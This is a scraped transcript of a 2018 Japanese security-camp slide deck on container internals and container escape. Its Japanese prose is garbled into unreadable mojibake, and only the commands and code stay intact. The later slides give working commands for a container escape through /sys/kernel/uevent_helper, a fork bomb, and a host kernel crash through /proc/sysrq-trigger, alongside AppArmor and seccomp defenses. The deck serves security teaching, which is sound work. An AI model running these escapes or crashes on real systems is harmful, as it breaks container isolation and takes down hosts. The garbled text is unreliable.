Upgrade to Pro — share decks privately, control downloads, hide ads and more …

コンテナの作り方、壊し方 / Container Structure and Exploitation Method

mrtc0
November 10, 2018

コンテナの作り方、壊し方 / Container Structure and Exploitation Method

セキュリティ・ミニキャンプ2018 in 愛媛での資料です。 #seccamp

mrtc0

November 10, 2018
Tweet

More Decks by mrtc0

Other Decks in Programming

Transcript

  1. ίϯςφͷ࡞Γํɺյ͠ํ
    ίϯςφͷηΩϡϦςΟΛ஌Ζ͏
    ৿ాߒฏ !NSUD
    (.01FQBCP *OD
    ηΩϡϦςΟɾϛχΩϟϯϓJOѪඤ

    View full-size slide

  2. (.0ϖύϘηΩϡϦςΟରࡦࣨ
    ৿ాߒฏ!NSUD
    ,PIFJ.PSJUB
    IUUQTCMPHTTSGJO

    View full-size slide

  3. ೥ʹηΩϡϦςΟΩϟϯϓશࠃେձʹࢀՃ
    ೥ΑΓ4&$$0/#FHJOOFSTߨࢣ
    େֶࡏֶத͸ΠΤϥΤηΩϡϦςΟʹͯ8FC੬ऑੑ਍அʢΞϧόΠτʣ
    ೥౓*1"ະ౿ΫϦΤΠλʔ
    ೥ʹ(.0ϖύϘגࣜձࣾʹೖࣾ

    View full-size slide

  4. ͸͡Ίʹ
    wຊεϥΠυ͸ʮ۝भηΩϡϦςΟΧϯϑΝϨϯεʯͰಉ྅ͷۙ౻Ӊஐ࿕͞Μ
    @udzura
    ͱൃදͨ͠಺༰ΛҰ෦վมͨ͠΋ͷͰ͋Δ
    wʮίϯςφͷηΩϡϦςΟΛத਎͔Βཧղ͠Α͏ʯ
    wIUUQTTQFBLFSEFDLDPNVE[VSBJOTJEFPVUDPOUBJOFSBOEJUTTFDVSJUZ
    wεϥΠυͷར༻ͷڐՄΛ௖͖ɺҰ෦վม͍ͯ͠·͢
    wշ୚௖͍ͨ!VE[VSB͞Μʹײँ͍ͨ͠·͢

    View full-size slide

  5. ͸͡Ίʹ
    wԋशϝΠϯͳͷͰɺࠔͬͨΒۙ͘ͷਓɺνϡʔλʔ͞ΜΛཔΓ·͠ΐ͏
    wίϚϯυ͕ࣦഊ͢Δɺૢ࡞͕Θ͔Βͳ͍ͳͲ͸ɺͲΜͲΜฉ͍͍ͯͩ͘͞
    wνʔτγʔτΛ༻ҙ͍ͯ͠ΔͷͰ͝׆༻͍ͩ͘͞
    wάϧʔϓͷਓͱ࿩͠ͳ͕ΒਐΊͯ0,Ͱ͢
    wੵۃతʹձ࿩͍ͯͩ͘͠͞ʂ

    View full-size slide

  6. "HFOEB
    ίϯςφԾ૝Խͱ͸ʁ
    ίϯςφͷ࢓૊ΈΛͷ͍ͧͯΈΑ͏
    ίϯςφΛ࡞ͬͯΈΑ͏
    ίϯςφͷηΩϡϦςΟϞσϧͱ"UUBDL4VSGBDFT
    ίϯςφΛյͦ͏

    View full-size slide

  7. ࠓ೔ͷΰʔϧ
    ίϯςφͷ࢓૊ΈΛͬ͘͟Γཧղ͠Α͏
    ίϯςφͷηΩϡϦςΟػߏΛ஌Ζ͏
    εΠʔενʔζϞσϧΛମݧ͠Α͏

    View full-size slide

  8. ίϯςφԾ૝Խͱ͸ʁ

    View full-size slide

  9. ࣍ͷιϑτ΢ΣΞΛ
    ࢖ͬͨ͜ͱ͕͋Δํʁ

    View full-size slide

  10. Ծ૝Խ
    7JSUVBMJ[BUJPO

    View full-size slide

  11. ͍ΘΏΔԾ૝Խ
    ϋʔυ΢ΣΞ
    ϗετ04ϋΠύʔόΠβ
    )BSEXBSF
    &NVMBUJPO
    )BSEXBSF
    &NVMBUJPO
    )BSEXBSF
    &NVMBUJPO
    ήετ04 ήετ04 ήετ04
    ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ
    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ

    View full-size slide

  12. ͍ΘΏΔԾ૝Խ
    ϋʔυ΢ΣΞ
    ϗετ04ϋΠύʔόΠβ
    )BSEXBSF
    &NVMBUJPO
    )BSEXBSF
    &NVMBUJPO
    )BSEXBSF
    &NVMBUJPO
    ήετ04 ήετ04 ήετ04
    ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ
    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ

    View full-size slide

  13. ίϯςφԾ૝Խ
    ϋʔυ΢ΣΞ
    ϗετ04 -JOVY

    ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ
    ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ
    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ
    04ͷػೳ͸ڞ௨Ͱ࢖༻
    ϗετͱಉ͡,FSOFMΛ࢖͏

    View full-size slide

  14. ίϯςφ͸Ͳ͜Ͱ࢖ΘΕ͍ͯΔ͔

    View full-size slide

  15. ίϯςφ͕ͲͷΑ͏ʹ࢖ΘΕ͍ͯΔ͔
    IUUQTFOXJLJQFEJBPSHXJLJ,VCFSOFUFT

    View full-size slide

  16. ίϯςφͷηΩϡϦςΟ
    ίϯςφϥϯλΠϜࣗମͷ࣮૷
    ίϯςφͷηΩϡϦςΟϙϦγʔ
    ίϯςφͷωοτϫʔΫ
    ΦʔέετϨʔγϣϯϚωʔδυαʔϏε

    View full-size slide

  17. ίϯςφͷ࣮૷

    View full-size slide

  18. -9$
    )"$0/*8"
    SLU

    View full-size slide

  19. ίϯςφͷϝϦοτ
    QSPT

    View full-size slide

  20. ίϯςφͷϝϦοτ
    ىಈ͕ߴ଎ɺܰྔ
    ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ

    View full-size slide

  21. ίϯςφͷϝϦοτ
    ىಈ͕ߴ଎ɺܰྔ
    ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ
    Ϋϥ΢υʹ޲͍͍ͯΔ
    ΞϓϦέʔγϣϯΛؙ͝ͱίϯςφԽɺߴ଎ͳσϓϩΠɺ։ൃ

    View full-size slide

  22. ίϯςφͷσϝϦοτ
    DPOT

    View full-size slide

  23. ݖݶ෼཭ Ϧιʔεޮ཰
    ϋΠύʔόΠβܕ
    ιϑτ΢ΣΞܕ
    ίϯςφܕ
    ݖݶ෼཭͕ऑ͍

    View full-size slide

  24. ίϯςφͷத਎Λͷ͍ͧͯΈΑ͏
    IUUQTqJDLSQBB,5I

    View full-size slide

  25. ίϯςφ͸Ͳ͏΍ͬͯ
    ίϯςφʹͳ͍ͬͯΔͷ͔ʁ

    View full-size slide

  26. ࣍ͷը໘Λݟͨ͜ͱ͕͋Δํʁ

    View full-size slide

  27. ϓϩηε
    1SPDFTT

    View full-size slide

  28. ίϯςφ͸ϓϩηε

    View full-size slide

  29. $ ./a.out
    BPVU
    -JOVYΧʔωϧ
    ϥΠϒϥϦ γεςϜίʔϧ

    View full-size slide

  30. BPVU
    $ ps xf -C a.out
    3262 ? S 0:00 sshd: vagrant@pts/2
    3263 pts/2 Ss 0:00 \_ -bash
    3372 pts/2 S+ 0:00 \_ ./a.out

    View full-size slide

  31. BPVU
    $ ps xf -C a.out
    3262 ? S 0:00 sshd: vagrant@pts/2
    3263 pts/2 Ss 0:00 \_ -bash
    3372 pts/2 S+ 0:00 \_ ./a.out


    View full-size slide

  32. $ ./a.out ࢠϓϩηε
    ਌ϓϩηε
    CBTIͳͲ

    ৽͍͠ϓϩάϥϜ
    fork(2)
    wait(2)
    execve(2)
    execve(“/bin/cat”, …)

    View full-size slide

  33. $ ./a.out ࢠϓϩηε
    ਌ϓϩηε
    CBTIͳͲ

    ৽͍͠ϓϩάϥϜ
    fork(2)
    wait(2)
    execve(2)
    ಛघͳॲཧ

    View full-size slide

  34. ίϯςφ͸ ಛघͳ
    ϓϩηε

    View full-size slide

  35. ී௨ͷϓϩηεͱίϯςφͷҧ͍
    w ίϯςφ͸ಛघͳϓϩηε
    w ۩ମతʹ͸
    ɹ
    ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠
    ɹ
    ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ
    ɹ͜ͱͰݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ

    View full-size slide

  36. ී௨ͷϓϩηεͱίϯςφͷҧ͍
    w ίϯςφ͸ಛघͳϓϩηε
    w ۩ମతʹ͸
    ɹ
    ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠
    ɹ
    ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ
    ɹ͜ͱͰݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ
    -JOVY
    /BNFTQBDF
    DHSPVQT

    View full-size slide

  37. ʮίϯςφ͸ϓϩηεͰ͋Δʯ
    ͜ͱΛ֬ೝ

    View full-size slide

  38. %PDLFSίϯςφͷىಈ
    $ docker ps -a
    CONTAINER ID IMAGE COMMAND
    4521880cffa8 minicamp-1 "/usr/sbin/apache2ct…"
    $ docker start 4521
    $ curl localhost:8080 -s | grep ''
    Apache2 Ubuntu Default Page: It works

    View full-size slide

  39. ϓϩηεπϦʔΛ֬ೝ
    $ ps auxf
    $ sudo apt-get install apache2 && sudo systemctl start apache2

    %PDLFS͕࡞ΔϓϩηεπϦʔΛݟΑ͏

    ϗετͰ௚઀BQBDIFΛ্ཱͪ͛ͯΈͯϓϩηεπϦʔΛݟΑ͏

    View full-size slide

  40. -JOVY/BNFTQBDF

    View full-size slide

  41. -JOVY/BNFTQBDFΛ֬ೝ͢Δ
    $ docker ps
    CONTAINER ID IMAGE COMMAND
    4521880cffa8 minicamp-1 “/usr/sbin/apache2ct…"
    $ docker exec -ti 45 bash # ίϯςφʹʮΞλονʯ͢Δ
    # ip a # ίϯςφ಺෦ͷωοτϫʔΫΛ֬ೝ͢Δ
    # exit # ίϯςφ͔Βൈ͚ͯ
    $ ip a # ϗετͷωοτϫʔΫͱൺֱ͢Δ

    View full-size slide

  42. $ ip a # ϗετଆ
    2: enp0s3: mtu 1500 qdisc pfifo_fast state
    UP group default qlen 1000
    link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3
    valid_lft forever preferred_lft forever
    inet6 fe80::40:c1ff:fefa:9bf5/64 scope link
    valid_lft forever preferred_lft forever
    # ip a # Dockerίϯςφଆ
    10: eth0@if11: mtu 1500 qdisc noqueue state
    UP group default
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
    valid_lft forever preferred_lft forever


    View full-size slide

  43. $ ip a # ϗετଆ
    2: enp0s3: mtu 1500 qdisc pfifo_fast state
    UP group default qlen 1000
    link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3
    valid_lft forever preferred_lft forever
    inet6 fe80::40:c1ff:fefa:9bf5/64 scope link
    valid_lft forever preferred_lft forever
    # ip a # Dockerίϯςφଆ
    10: eth0@if11: mtu 1500 qdisc noqueue state
    UP group default
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
    valid_lft forever preferred_lft forever


    ίϯςφ͸ಉ͡Ϛγϯʹ͋Δϓϩηε
    ʹ΋͔͔ΘΒͣɺಠཱͨ͠ωοτϫʔΫ͕౰͍ͨͬͯΔ

    View full-size slide

  44. ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ
    $ docker exec -ti 45 hostname
    4521880cffa8
    $ hostname
    ubuntu-xenial
    w ϗετ໊΋ҟͳ͍ͬͯΔ͜ͱΛ֬ೝͯ͠ΈΑ͏

    View full-size slide

  45. ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ
    w ϓϩηεʹ͸ϓϩηε*% 1*%
    ͕͋Δ͕ɺͦͷ࠾൪͕ʮಠཱʯ͍ͯ͠Δ
    w ಉ͡1*%ʹҧ͏ϓϩηεׂ͕Γ౰ͯΒΕ͍ͯΔ͜ͱΛ֬ೝ͠Α͏
    $ docker exec -ti 45 ps auxf
    $ ps auxf

    View full-size slide

  46. Πϝʔδ
    host-1
    192.168.1.1/24
    container-1
    172.16.1.1/24
    container-2
    10.1.1.1/24
    ϗετ04 -JOVY

    ίϯςφ ίϯςφ
    w ʮϓϩηεΛ෼཭ʯ͍ͯ͠Δɻ04ͷػೳ͸ϗετͱڞ༗ɻ

    View full-size slide

  47. /BNFTQBDF͸
    Ͳ͜Ͱ֬ೝ͢Δʁ

    View full-size slide

  48. /BNFTQBDFΛݟΔ
    $ ps auxf | grep -A 10 docker[d]
    ϗετ͔Βݟͨίϯςφͷ"QBDIFͷ1*%Λ֬ೝ͠Α͏
    $ sudo ls -l /proc/$PID/ns
    ҎԼͷσΟϨΫτϦΛௐ΂Δ
    $ sudo ls -l /proc/self/ns
    ϗετͷํ͸Ͳ͏ͳͷ͔ௐ΂ͯ໨EJ⒎͠Α͏

    View full-size slide

  49. $ sudo ls -l /proc/3625/ns
    total 0
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835]
    lrwxrwxrwx 1 root root 0 Nov 3 03:08 ipc -> ipc:[4026532276]
    lrwxrwxrwx 1 root root 0 Nov 3 03:08 mnt -> mnt:[4026532274]
    lrwxrwxrwx 1 root root 0 Nov 3 02:55 net -> net:[4026532279]
    lrwxrwxrwx 1 root root 0 Nov 3 03:08 pid -> pid:[4026532277]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837]
    lrwxrwxrwx 1 root root 0 Nov 3 03:08 uts -> uts:[4026532275]
    $ sudo ls -l /proc/self/ns
    total 0
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 ipc -> ipc:[4026531839]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 mnt -> mnt:[4026531840]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 net -> net:[4026531957]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 pid -> pid:[4026531836]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837]
    lrwxrwxrwx 1 root root 0 Nov 3 03:45 uts -> uts:[4026531838]
    ໨EJ⒎͠Α͏

    View full-size slide

  50. &OUFSUIF/BNFTQBDF
    w ωοτϫʔΫۭؒͷΈʹΞλονͯ͠ΈΑ͏
    JQBͷ݁Ռ͸%PDLFSϗετͱൺ΂ͯͲ͏ʁ
    IPTUOBNFͷ࣮ߦ݁Ռ͸ʁ
    $ sudo nsenter --net -t $PID
    $ sudo nsenter --uts -t $PID

    View full-size slide

  51. -JOVY/BNFTQBDF
    ໊લۭؒ ֓ཁ
    1*%໊લۭؒ 1*%ͷ෼཭
    Ϛ΢ϯτ໊લۭؒ ϑΝΠϧγεςϜπϦʔͷ෼཭
    *1$໊લۭؒ *1$ͷ෼཭
    ωοτϫʔΫ໊લۭؒ ωοτϫʔΫΠϯλʔϑΣΠεͷ෼཭
    654໊લۭؒ ϗετ໊ͷ෼཭
    Ϣʔβʔ໊લۭؒ 6*%(*%ͷ෼཭

    View full-size slide

  52. ίϯςφͷϝϦοτ
    ىಈ͕ߴ଎ɺܰྔ
    ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ

    View full-size slide

  53. ίϯςφͷϝϞϦׂΓ౰ͯΛ֬ೝ
    ϝϞϦͷׂ౰Λ֬ೝ͠Α͏
    $ CID=$(docker inspect -f '{{.ID}}' 45)
    $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes
    $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes
    ׂ౰ͷগͳ͍ίϯςφΛ࡞Γɺൺֱ͠Α͏
    $ CID2=$(docker run --memory=8m -d minicamp-1);
    $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes
    $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes

    View full-size slide

  54. ൺֱ͠Α͏
    ੍ݶͷ༗ແͰίϯςφͷॲཧ଎౓͕ҟͳΔ͜ͱΛ֬ೝ͠Α͏
    $ docker exec -ti $CID bash
    $ docker exec -ti $CID2 bash
    wBQUHFUVQEBUFΛ࣮ߦͯ͠ΈΑ͏
    ௚઀ϝϞϦ࢖༻ྔΛมߋͯ͠ڍಈ͕վળ͢Δ͜ͱΛ֬ೝ͠Α͏
    $ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes
    $ docker exec -ti $CID2 bash
    root@d6a2825b878a:/# apt-get update

    View full-size slide

  55. DHSPVQTͰ੍ޚͰ͖Δ΋ͷ
    w $16
    w ϝϞϦ
    w σΟεΫ*0ͷଳҬ
    w ϓϩηε਺
    w FUDʜ

    View full-size slide

  56. ίϯςφΛ࡞ͬͯΈΑ͏
    IUUQTqJDLSQBQH/#

    View full-size slide

  57. )BDPOJXB
    w @udzura (.0ϖύϘ
    ΒʹΑͬͯ։ൃ͞Εͨ-JOVYίϯςφϥϯλΠϜ
    w NSVCZͰઃఆ΍ϑοΫΛهड़Ͱ͖Δͷ͕ಛ௃
    w IUUQTHJUIVCDPNIBDPOJXBIBDPOJXB
    $ haconiwa version
    haconiwa: v0.9.5

    View full-size slide

  58. Πϝʔδ SPPUGT
    Λ࡞Δ
    $ mkdir /tmp/minicamp
    $ docker export 45 | sudo tar -xv -f - -C /tmp/minicamp/
    $ ls /tmp/minicamp/
    bin boot dev etc home lib lib64 media mnt opt proc root
    run sbin srv sys tmp usr var

    View full-size slide

  59. ઃఆϑΝΠϧΛੜ੒
    $ haconiwa init first-container.haco
    assign new haconiwa name = haconiwa-4ad5ea68
    assign rootfs location = /var/lib/haconiwa/4ad5ea68
    create first-container.haco

    View full-size slide

  60. ઃఆΛมߋ
    # -*- mode: ruby -*-
    Haconiwa.define do |config|
    # The container name and container's hostname:
    config.name = "haconiwa-4ad5ea68"
    # The first process when invoking haconiwa run:
    config.init_command = "/bin/bash"
    # If your first process is a daemon, please explicitly daemonize by:
    # config.daemonize!
    . . .
    # The rootfs location on your host OS
    # Pathname class is useful:
    root = Pathname.new(“/tmp/minicamp”)
    config.chroot_to root

    View full-size slide

  61. ίϯςφΛىಈ
    $ haconiwa run first-container.haco
    Create lock: #
    Container fork success and going to wait: pid=6855
    groups: cannot find name for group ID 1000
    root@haconiwa-4ad5ea68:/# ps ax
    PID TTY STAT TIME COMMAND
    1 pts/3 S 0:00 /bin/bash
    8 pts/3 R+ 0:00 ps ax

    View full-size slide

  62. εΫϥονͰ࡞Ζ͏

    View full-size slide

  63. ·ͣ͸GPSLFYFDWFDISPPU͚ͩͰ
    pid = Process.fork do
    Dir.chroot "/tmp/minicamp/"
    Dir.chdir "/"
    Exec.execve ENV, "/bin/bash"
    end
    p(Process.waitpid2 pid)
    $ hacorb test.rb
    bash-4.3$ pwd
    /
    bash-4.3$ ls
    bin boot dev etc home lib lib64 media mnt opt proc root
    run sbin srv sys tmp usr var

    View full-size slide

  64. 1*%໊લۭؒΛ෼཭
    Namespace.unshare(Namespace::CLONE_NEWPID)
    pid = Process.fork do
    Dir.chroot "/tmp/minicamp/"
    Dir.chdir "/"
    Exec.execve ENV, "/bin/bash"
    end
    $ sudo hacorb test.rb
    bash-4.3$ mount -t proc proc /proc
    bash-4.3$ ps aux

    View full-size slide

  65. DHSPVQΛઃఆ
    limit = “3"
    Namespace.unshare(Namespace::CLONE_NEWPID)
    pid = Process.fork do
    Dir.mkdir "/sys/fs/cgroup/pids/minicamp" rescue nil
    system "echo #{limit} > /sys/fs/cgroup/pids/minicamp/pids.max"
    system "echo #{Process.pid} > /sys/fs/cgroup/pids/minicamp/tasks"
    Dir.chroot "/tmp/minicamp/"
    Dir.chdir "/"
    Exec.execve ENV, "/bin/bash"
    end
    $ sudo hacorb test.rb
    # ( echo 'test' | cat )
    # bomb () { bomb | bomb & }; bomb

    View full-size slide

  66. ͜͜·Ͱͷ·ͱΊ
    w ίϯςφ͸ϗετ͔ΒݟΔͱ୯ͳΔϓϩηεͰ͋Δ
    w -JOVY͕࣋ͭίϯςφԽͷػೳΛ૊Έ߹Θ͍ͤͯΔ
    w ϓϩηεͷಠཱੑΛߴΊΔ /BNFTQBDF

    w ϦιʔεΛׂΓ͋ͯΔʢDHSPVQ

    w ͦΕҎ֎΋͋ΔΑ

    View full-size slide

  67. ෼΄Ͳٳܜ
    IUUQTqJDLSQQU,O/

    View full-size slide

  68. ίϯςφͷηΩϡϦςΟϞσϧͱ
    "UUBDL4VSGBDFT
    IUUQTqJDLSQB)9

    View full-size slide

  69. ίϯςφͷηΩϡϦςΟػߏ
    w -JOVY/BNFTQBDFʹΑΔ෼཭
    w DHSPVQʹΑΔϦιʔε੍ޚ

    View full-size slide

  70. ίϯςφͷηΩϡϦςΟػߏ
    w -JOVY/BNFTQBDFʹΑΔ෼཭
    w DHSPVQʹΑΔϦιʔε੍ޚ
    w "QQ"SNPS
    w TFDDPNQ
    w ಛఆͷϑΝΠϧͷύʔϛογϣϯΛམͱ͢

    View full-size slide

  71. ίϯςφԾ૝Խ
    ϋʔυ΢ΣΞ
    ϗετ04 -JOVY

    ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ
    ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ
    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ
    04ͷػೳ͸ڞ௨Ͱ࢖༻
    ϗετͱಉ͡,FSOFMΛ࢖͏

    View full-size slide

  72. "UUBDL4VSGBDFT
    ,FSOFM
    $POUBJOFS $POUBJOFS $POUBJOFS
    6TFS
    4FDVSJUZ1PMJDZ

    View full-size slide

  73. "UUBDL4VSGBDFT
    ,FSOFM
    $POUBJOFS $POUBJOFS $POUBJOFS
    6TFS
    4FDVSJUZ1PMJDZ

    Χʔωϧͷ੬ऑੑΛಥ͘

    View full-size slide

  74. "UUBDL4VSGBDFT
    ,FSOFM
    $POUBJOFS $POUBJOFS $POUBJOFS
    6TFS
    4FDVSJUZ1PMJDZ


    ίϯςφͷઃఆෆඋΛಥ͘
    FHEPDLFSŠQSJWJMFHFE

    View full-size slide

  75. "UUBDL4VSGBDFT
    ,FSOFM
    $POUBJOFS $POUBJOFS $POUBJOFS
    6TFS
    4FDVSJUZ1PMJDZ

    ωοτϫʔΫͷઃఆෆඋΛಥ͘

    View full-size slide

  76. "UUBDL4VSGBDFT
    ,FSOFM
    6TFS
    4FDVSJUZ1PMJDZ

    ωοτϫʔΫͷઃఆෆඋΛಥ͘
    $POUBJOFS $POUBJOFS $POUBJOFS

    View full-size slide

  77. εΠενʔζϞσϧ
    w ίϯςφͰར༻͞ΕΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳ͕ॏෳ͍ͯ͠Δ΋ͷ΋͋Δ
    w $BQBCJMJUZͱTFDDPNQͷ྆ํͰಛఆͷγεςϜίʔϧΛېࢭ͍ͯͨ͠Γ
    w ͋Δػߏ͕#ZQBTT͞Εͯ͠·ͬͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ



    View full-size slide

  78. ίϯςφΛյͦ͏

    View full-size slide

  79. $POUBJOFS4FDVSJUZ
    04Ϧιʔεͷ෼཭
    1SPDFTT pMFTZTUFN FUDʜ

    wDISPPUQJWPU@SPPU
    w-JOVY/BNFTQBDF
    wTFDDPNQ
    w-JOVY$BQBCJMJUZ
    wDHSPVQT
    w4&-JOVY"QQ"SNPS
    ݖݶػೳͷ੍ݶ
    QFSNJTTJPO TZTDBMM

    04Ϧιʔεͷ੍ݶ
    $16 .FNPSZ

    ΞΫηείϯτϩʔϧ
    ಛఆͷϑΝΠϧ΁ͷΞΫηεېࢭʣ

    View full-size slide

  80. "QQ"SNPS
    wίϯςφ͸ϗετͱҰ෦ͷϑΝΠϧΛڞ༗͍ͯ͠Δ
    wಡΈॻ͖͕Ͱ͖ΔͱϗετʹӨڹΛٴ΅͢ϑΝΠϧ΋͋Δ
    wFY
    /proc/kcore /proc/sysrq-trigger
    w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSͰ੍ޚ͍ͯ͠Δ
    w΋͠ॻ͖ࠐΊͨ৔߹ʹͲͷΑ͏ͳ͜ͱ͕ى͜Δͷ͔͔֬ΊͯΈΑ͏ʂ

    View full-size slide

  81. /sys/kernel/uevent_helper
    wuevent͸σόΠε͕௥Ճ࡟আ͞Εͨͱ͖ʹΧʔωϧ͕ૹ৴͢ΔΠϕϯτ
    wuevent͕ૹ৴͞Εͨͱ͖ʹɺuevent_helperʹॻ͖ࠐ·Ε͍ͯΔύεͷϓ
    ϩάϥϜΛ࣮ߦ͢Δ
    wuevent͸Ϣʔβʔϥϯυ͔Βૹ৴Մೳ
    •/sys/devices/virtual/mem/null/uevent
    •/sys/class/mem/null/uevent

    View full-size slide

  82. ίϯςφΛىಈͯ͠ઃఆ
    $ haconiwa start sample1.haco
    root@sample:/# echo “export PATH=$PATH” >> /root/.bashrc
    root@sample:/# bash
    root@sample:/# apt-get install gcc

    View full-size slide

  83. ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏
    $ haconiwa start sample1.haco
    root@sample:/# cat /root/hello.sh # ޷͖ͳΤσΟλͰॻ͖ࠐΉ
    #!/bin/sh
    echo “Hello, Host! ;)” > /tmp/hello.txt
    root@sample:/# chmod +x /root/hello.sh
    root@sample:/# echo “/var/lib/haconiwa/sample/root/hello.sh”
    > /sys/kernel/uevent_helper

    View full-size slide

  84. ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏
    $ ls /tmp/
    root@sample:/# echo change > /sys/class/mem/null/uevent
    $ ls /tmp
    hello.txt
    $ cat /tmp/hello.txt
    hello host! ;)

    View full-size slide

  85. QSPDTZTSRUSJHHFS
    root@sample1:/# echo c > /proc/sysrq-trigger
    w/proc/sysrq-triggerʹಛఆͷจࣈྻΛૹ৴͢Δ͜ͱͰϗετΛ࠶ىಈ͞
    ͤͨΓΧʔωϧύχοΫΛىͨ͜͠ΓͰ͖Δ

    View full-size slide

  86. "QQ"SNPS
    deny /usr/bin/top mrwklx, # top ίϚϯυͷಡΈॻ͖࣮ߦΛېࢭ
    wϓϩάϥϜ୯ҐͰϑΝΠϧ΍ιέοτ΁ͷڧ੍ΞΫηε੍ޚ ."$
    Λߦ͏
    wNSLXLMY͸ΞΫηεϞʔυΛද͠ɺS͸3FBE X͸XSJUF Y͸࣮ߦΛද͢
    wIUUQNBOQBHFTVCVOUVDPNNBOQBHFTCJPOJDNBOBQQBSNPSE
    IUNM

    View full-size slide

  87. ๷͍ͰΈΑ͏
    $ cat apparmor/haconiwa-test

    deny /usr/bin/top mrwklx,
    deny @{PROC}/sysrq-trigger rwklx,

    wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏

    View full-size slide

  88. ๷͍ͰΈΑ͏
    $ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/
    $ sudo apparmor_parser -Kr \
    /etc/apparmor.d/haconiwa/haconiwa-test
    $ cat sample1.haco

    config.apparmor = "haconiwa-test"

    wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏

    View full-size slide

  89. ๷͍ͰΈΑ͏
    $ haconiwa start sample1.haco
    root@sample1:/# top
    bash: /usr/bin/top: Permission denied
    root@sample1:/# echo c > /proc/sysrq-trigger
    bash: /proc/sysrq-trigger: Permission denied

    View full-size slide

  90. "QQ"SNPSʹΑΔอޢ
    w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSʹΑͬͯίϯςφͰར༻Ͱ͖Δί
    Ϛϯυͷ࣮ߦ΍ϑΝΠϧ΁ͷಡΈॻ͖Λ੍ݶͰ͖Δ
    •/proc/sysrq-trigger
    •/proc/sys/kernel/core_pattern
    •/proc/sys/kernel/modprobe
    •/sys/kernel/uevent_helper

    View full-size slide

  91. TFDDPNQ
    wγεςϜίʔϧͷϑΟϧλϦϯάΛߦ͏࢓૊Έ
    wϗετଆʹΤεέʔϓΛڐͯ͠͠·͏Α͏ͳةݥͳγεςϜίʔϧΛ๷͙
    root@sample1:/# mkdir /tmp/hoge
    Bad system call

    View full-size slide

  92. TFDDPNQΛମݧ͠Α͏
    $ cat sample2.haco
    config.seccomp.filter(default: :allow) do |rule|
    rule.kill :mkdir # mkdir(2) Λېࢭ
    end
    $ sudo haconiwa start sample2.haco
    root@sample1:/# mkdir /tmp/hoge
    Bad system call

    View full-size slide

  93. TZTDBMM
    LFYFD@MPBE
    JOJU@NPEVMF
    pOJU@NPEVMF
    EFMFUF@NPEVMF
    PQFO@CZ@IBOEMF@BU
    ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ
    ΧʔωϧϞδϡʔϧΛϩʔυ
    ΧʔωϧϞδϡʔϧΛϩʔυ
    ΧʔωϧϞδϡʔϧΛ࡟আ
    ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘
    ېࢭ͞Ε͍ͯΔγεςϜίʔϧ

    View full-size slide

  94. TFDDPNQͷCZQBTT
    wTFDDPNQϕʔεͷ4BOECPY؀ڥ͸Τεέʔϓ͢Δ͜ͱ͕Ͱ͖Δ
    wmkdir(2)͕ېࢭ͞Ε͍ͯͯ΋ճආͰ͖Δ
